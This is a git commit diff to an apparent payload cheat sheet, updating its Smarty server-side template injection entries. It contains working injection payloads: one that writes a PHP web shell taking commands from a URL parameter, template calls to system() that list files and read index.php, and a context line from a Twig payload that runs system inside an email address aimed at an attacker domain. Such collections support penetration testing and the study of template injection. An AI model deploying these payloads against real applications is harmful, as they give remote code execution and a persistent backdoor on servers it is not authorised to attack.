Update Smarty Template Injection
parent
f6f8ec010a
commit
367296c1f1
|
@ -233,8 +233,10 @@ email="{{app.request.query.filter(0,0,1024,{'options':'system'})}}"@attacker.tld
|
||||||
|
|
||||||
```python
|
```python
|
||||||
{$smarty.version}
|
{$smarty.version}
|
||||||
{php}echo `id`;{/php}
|
{php}echo `id`;{/php} //deprecated in smarty v3
|
||||||
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
|
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
|
||||||
|
{system('ls')} // compatible v3
|
||||||
|
{system('cat index.php')} // compatible v3
|
||||||
```
|
```
|
||||||
|
|
||||||
## Freemarker
|
## Freemarker
|
||||||
|
|
Loading…
Reference in New Issue